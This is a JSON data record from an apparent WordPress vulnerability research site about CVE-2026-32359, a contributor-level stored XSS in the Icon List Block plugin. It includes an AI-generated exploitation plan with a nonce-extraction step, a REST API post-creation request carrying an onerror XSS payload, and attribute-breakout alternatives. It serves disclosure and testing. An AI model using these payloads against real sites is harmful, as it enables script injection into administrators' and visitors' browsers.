[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fQiZHpd65k2eFgb5sdvIxKbxflDRPkJOCW7I27usceXc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32359","icon-list-block-authenticated-contributor-stored-cross-site-scripting-2","Icon List Block \u003C= 1.2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Icon List Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","icon-list-block",null,"\u003C=1.2.3","1.2.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-15 00:00:00","2026-04-15 21:05:20",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff6655dc6-cf03-40c4-8fb2-fce6cfb069a6?source=api-prod",60,[22,23,24,25,26,27,28,29],"build\u002Fdashboard.asset.php","build\u002Fdashboard.css","build\u002Fdashboard.js","build\u002Findex.asset.php","build\u002Findex.css","build\u002Findex.js","build\u002Frender.php","build\u002Fview.asset.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-32359 (Icon List Block)\n\n## 1. Vulnerability Summary\nThe **Icon List Block** plugin (\u003C= 1.2.3) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin allows users with Contributor-level permissions or higher to create Gutenberg blocks where specific attributes are stored without sufficient sanitization. \n\nWhen the block is rendered on the frontend, the `build\u002Frender.php` file outputs the block's attributes into a `data-attributes` attribute of a wrapper `div`. A corresponding frontend JavaScript file (implied by `build\u002Fview.asset.php`) then parses this JSON data and renders it into the DOM. The failure occurs in this frontend rendering phase, where the data is likely inserted using an unsafe method (like jQuery's `.html()` or native `.innerHTML`) without escaping.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress REST API for Posts (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`) or the standard Post Editor.\n- **Vulnerable Block:** `icon-list-block\u002Ficon-list` (inferred from plugin slug and `render.php`).\n- **Vulnerable Parameter:** Block attributes, specifically item text\u002Flabels within the list.\n- **Authentication Level:** Contributor or higher. Contributors can create posts and insert any registered block.\n- **Preconditions:** The plugin must be active, and a post containing the malicious block must be viewed by a user (e.g., an Admin reviewing a \"Pending\" post).\n\n## 3. Code Flow\n1.  **Entry Point (Editor):** A Contributor creates or edits a post. They add an \"Icon List Block\".\n2.  **Storage:** The Gutenberg editor sends the block's attributes as JSON within the `post_content` (wrapped in HTML comments). \n3.  **Frontend Rendering (PHP):** When a user views the post, WordPress executes `build\u002Frender.php`:\n    - `get_block_wrapper_attributes()` generates classes\u002FIDs.\n    - `wp_json_encode($attributes)` serializes the user-controlled attributes.\n    - `esc_attr()` escapes the JSON string for use in the HTML attribute.\n    - Result: `\u003Cdiv ... data-attributes='{\"items\":[{\"text\":\"\u003Cimg src=x onerror=alert(1)>\"}]}'>\u003C\u002Fdiv>`\n4.  **Frontend Execution (JS):** The script defined in `build\u002Fview.js` (referenced by `build\u002Fview.asset.php`) executes:\n    - It selects the `div` by ID (e.g., `ilbIconList-...`).\n    - It reads the `data-attributes` value.\n    - It parses the JSON.\n    - **Sink:** It iterates through the items and inserts the `text` or `label` value into the DOM using an unsafe sink (e.g., `element.innerHTML = item.text`), triggering the XSS.\n\n## 4. Nonce Acquisition Strategy\nWhile saving a post via the REST API requires a `_wpnonce`, the agent can simplify the exploit by using the browser to manipulate the block editor directly or by extracting the REST nonce from a loaded admin page.\n\n1.  **Identify Nonce:** Navigate to `\u002Fwp-admin\u002Fpost-new.php`.\n2.  **Extract:** Use `browser_eval` to get the REST nonce:\n    ```javascript\n    window.wpApiSettings.nonce\n    ```\n3.  **Identify Block Name:** Use `browser_eval` to confirm the block name:\n    ```javascript\n    wp.blocks.getBlockTypes().map(b => b.name).filter(n => n.includes('icon-list'))\n    ```\n    *Result likely:* `icon-list-block\u002Ficon-list` or `ilb\u002Ficon-list`.\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing the malicious block attributes.\n\n### Step 1: Create the Malicious Post\nThe agent will send a REST API request to create a post.\n\n- **Method:** `POST`\n- **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n- **Headers:** \n    - `Content-Type: application\u002Fjson`\n    - `X-WP-Nonce: [EXTRACTED_NONCE]`\n- **Body:**\n```json\n{\n  \"title\": \"XSS Proof of Concept\",\n  \"status\": \"pending\",\n  \"content\": \"\u003C!-- wp:icon-list-block\u002Ficon-list {\\\"items\\\":[{\\\"label\\\":\\\"\u003Cimg src=x onerror=alert(window.origin)>\\\",\\\"icon\\\":\\\"fa-check\\\"}]} \u002F-->\"\n}\n```\n*(Note: The attribute name `label` is inferred from typical Icon List structures. If `label` fails, `text` or `content` will be tried.)*\n\n### Step 2: Trigger the XSS\nThe agent will navigate to the newly created post's frontend URL.\n\n## 6. Test Data Setup\n1.  **User:** Create a user with the `contributor` role.\n2.  **Login:** Log in as the contributor.\n3.  **Verification Page:** No special shortcode is needed as the block itself provides the rendering logic via `render.php`.\n\n## 7. Expected Results\n- The HTTP response from the REST API should be `201 Created`.\n- When navigating to the post URL, the browser should execute `alert(window.origin)`.\n- The HTML source will show the payload inside the `data-attributes` attribute, and the JavaScript will have rendered it as a live DOM element.\n\n## 8. Verification Steps\n1.  **Check DB:** Use WP-CLI to verify the payload is stored:\n    ```bash\n    wp post list --post_type=post --format=csv | grep \"XSS Proof of Concept\"\n    wp post get [POST_ID] --field=content\n    ```\n2.  **Verify Execution:** Use `browser_eval` to check if a specific global variable or side effect was created by the XSS payload (if `alert` is not capturable).\n\n## 9. Alternative Approaches\n- **Attribute Breakout:** If the JS doesn't use `innerHTML` but instead sets other attributes, try breaking out of those: `icon=\"fas fa-search' onmouseover='alert(1)\"`.\n- **Editor-Side XSS:** Check if the XSS triggers inside the Gutenberg editor itself by navigating the contributor to the post edit screen after saving. This would be \"Authenticated Stored XSS in Admin\".\n- **Shortcode Discovery:** If the block name is different, use:\n    ```bash\n    grep -r \"registerBlockType\" wp-content\u002Fplugins\u002Ficon-list-block\u002F\n    ```\n    to find the exact string.","The Icon List Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via block attributes in versions up to 1.2.3. Authenticated attackers with contributor-level access can inject arbitrary web scripts into pages that execute when users access the affected content because the plugin fails to sanitize user-supplied attributes before they are rendered on the frontend.","\u003C?php\n\u002F\u002F build\u002Frender.php lines 1-7\n$id = wp_unique_id('ilbIconList-');\n?>\n\u003Cdiv \u003C?php echo wp_kses_post(get_block_wrapper_attributes()); ?> id='\u003C?php echo esc_attr($id); ?>'\n  data-attributes='\u003C?php echo esc_attr(wp_json_encode($attributes)); ?>'>\n\u003C\u002Fdiv>","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ficon-list-block\u002F1.2.3\u002Fbuild\u002Fdashboard.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ficon-list-block\u002F1.2.4\u002Fbuild\u002Fdashboard.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ficon-list-block\u002F1.2.3\u002Fbuild\u002Fdashboard.asset.php\t2025-11-13 06:42:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ficon-list-block\u002F1.2.4\u002Fbuild\u002Fdashboard.asset.php\t2026-02-23 09:46:22.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => '7eb3c45e9131037a27b2');\n+\u003C?php return array('dependencies' => array('react', 'react-dom', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-i18n'), 'version' => 'da82bc6e38d00dd06749');","1. Authenticate as a user with Contributor-level access or higher.\n2. Create a new post and insert an 'Icon List' block.\n3. Using the block editor or the WordPress REST API (\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts), set the block's attributes (such as 'label' or 'text' within the 'items' array) to include an XSS payload like `\u003Cimg src=x onerror=alert(document.domain)>`.\n4. Save the post as a draft or submit it for review.\n5. When an administrator or any site visitor views the post, the frontend JavaScript parses the JSON data from the 'data-attributes' wrapper and injects the malicious content into the DOM using an unsafe sink (likely innerHTML), triggering the execution of the script.","gemini-3-flash-preview","2026-04-20 22:11:16","2026-04-20 22:11:45",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.2.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ficon-list-block\u002Ftags\u002F1.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ficon-list-block.1.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ficon-list-block\u002Ftags\u002F1.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ficon-list-block.1.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ficon-list-block\u002Ftags"]